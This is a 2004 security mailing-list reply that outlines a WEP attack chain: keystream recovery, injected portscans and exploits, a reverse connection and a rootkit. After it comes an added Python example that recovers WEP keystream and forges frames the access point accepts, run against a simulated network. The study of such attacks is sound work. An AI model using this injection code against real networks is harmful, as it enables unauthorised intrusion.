Re: Wireless wep crackin on windows

From: Andrew A. Vladimirov (mlists@arhont.com)
Date: Fri May 21 2004 - 10:35:07 EDT


Aaron Drew wrote:
> I would love to be enlightened but
> I fail to see how this is 'full access' given that it only provides the PRN
> sequence of a single IV/Key pair. Since APs use different IVs for each
> packet transmitted, how is it possible to use their PRN discovery technique
> to gain access to packets encrypted with all other IVs?

You can obtain full access, but only very laterally :)

1. Get a piece of the keystream using the weakness of the authentication
via WEP if this method is used (the current WEPWedgie version does that) or
via predictable packets (ARP, DHCP, TCP SYNs and SYN-ACKs etc. - the
second version of WEPWedgie will do that).

2. Use that piece for injecting portscans into the WLAN a la WEPWedgie.

3. On the basis of the portscans data, use the known piece of keystream
to inject exploit code against hosts that are likely to be vulnerable.

4. Upon exploitation, a reverse connection must be established to a
listener on the wired side. Then you can grab the WEP key, install your
favourite rootkit and so on :)

Of course, all of this is highly conditional, for example there must be
a host on the wired side that you control, e.g. the traffic from the
WLAN should be routable to the Internet. The hosts on the WLAN side must
be vulnerable to exploitation, but in my experience this is often the
case with unpatched / default install machines behind the firewall.

Cheers,
Andrew

--
Dr. Andrew A. Vladimirov
CISSP #34081, CWNA, CCNP/CCDP, TIA Linux+
CSO
Arhont Ltd - Information Security.
Web: http://www.arhont.com
      http://www.wi-foo.com
Tel: +44 (0)870 44 31337
Fax: +44 (0)117 969 0141
GPG: Key ID - 0x1D312310
GPG: Server - gpg.arhont.com
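Worked example of steps 1 to 3 above, added here as an illustration; it is not part of Andrew's post and not the WEPWedgie code. It simulates a WEP-40 station and AP with a constructed key, IV and shared-key authentication challenge (all assumptions), recovers the keystream for that one IV from the station's encrypted challenge response, and reuses it to inject an attacker-chosen frame that the AP accepts. The attacker side (recover_keystream, inject) never touches the key; the key is used only to play the station and the AP.

```python
"""Keystream recovery and frame injection against WEP (steps 1-3 above).

Constructed example: the WEP key below stands in for a key the attacker
does NOT know; it is used only to simulate the station and the AP.
"""
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds RC4 with IV || key for every frame."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 over the plaintext, little-endian."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Legitimate station: IV(3) || key-id(1) || RC4(IV||key, plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + wep_icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """AP side: strip IV/key-id, decrypt, return plaintext only if the ICV verifies."""
    iv, body = frame[:3], frame[4:]
    pt_icv = rc4(iv + key, body)
    pt, icv = pt_icv[:-4], pt_icv[-4:]
    return pt if wep_icv(pt) == icv else None


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Step 1: keystream = ciphertext XOR (known plaintext || ICV(known plaintext)).
    Only len(known_plaintext)+4 bytes come out, and they belong to this frame's IV."""
    iv, body = frame[:3], frame[4:]
    expected = known_plaintext + wep_icv(known_plaintext)
    keystream = bytes(c ^ p for c, p in zip(body, expected))
    return iv, keystream


def inject(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Steps 2-3: encrypt an attacker-chosen payload under the same IV, no key needed.
    WEP receivers do not reject repeated IVs, so the old IV is simply reused.
    The payload plus its 4-byte ICV must fit inside the recovered keystream."""
    pt_icv = plaintext + wep_icv(plaintext)
    if len(pt_icv) > len(keystream):
        raise ValueError("payload exceeds recovered keystream length")
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(pt_icv, keystream))


def shared_key_auth_response(challenge: bytes) -> bytes:
    """Body of the 3rd shared-key authentication frame, which the station encrypts:
    algorithm=1 (shared key), seq=3, status=0, challenge-text IE (tag 0x10, len 128).
    Every byte is predictable to an eavesdropper who saw the cleartext challenge."""
    return b"\x01\x00" + b"\x03\x00" + b"\x00\x00" + bytes([0x10, len(challenge)]) + challenge


# --- constructed simulation (assumed values, not from any real capture) ------
WEP_KEY = bytes([0x01, 0x02, 0x03, 0x04, 0x05])   # 40-bit key; unknown to the attacker
IV = bytes([0x3B, 0x11, 0x07])                   # IV the station happened to use
CHALLENGE = bytes((i * 37 + 11) & 0xFF for i in range(128))  # AP's cleartext challenge
# Stand-in for an LLC/SNAP + IP + TCP SYN probe the attacker wants on the WLAN.
PROBE = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"<constructed IPv4/TCP SYN to port 22>"


def demo() -> bool:
    """Run the attack end to end; True if the AP accepts the injected frame."""
    # What the attacker sniffs: the station's encrypted auth response.
    sniffed = wep_encrypt(WEP_KEY, IV, shared_key_auth_response(CHALLENGE))
    # Step 1: derive keystream from known plaintext (no key involved).
    iv, keystream = recover_keystream(sniffed, shared_key_auth_response(CHALLENGE))
    # Steps 2-3: reuse it to encrypt our own frame under the same IV.
    forged = inject(iv, keystream, PROBE)
    # The AP, holding the real key, decrypts it and the ICV verifies.
    return wep_decrypt(WEP_KEY, forged) == PROBE


if __name__ == "__main__":
    print("injected frame accepted:", demo())
```

The shared-key exchange yields 136 + 4 = 140 keystream bytes, which caps the size of anything injected under that IV; predictable ARP or DHCP frames give shorter pieces, which is why a scan or exploit payload has to be small or split across several recovered IV/keystream pairs. Note that nothing here reveals the key itself, which is exactly why step 4 in the post, the reverse connection from a compromised host, is needed for full access. A real injection additionally needs the 802.11 MAC header in front of this body and raw-frame transmit support in the driver.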

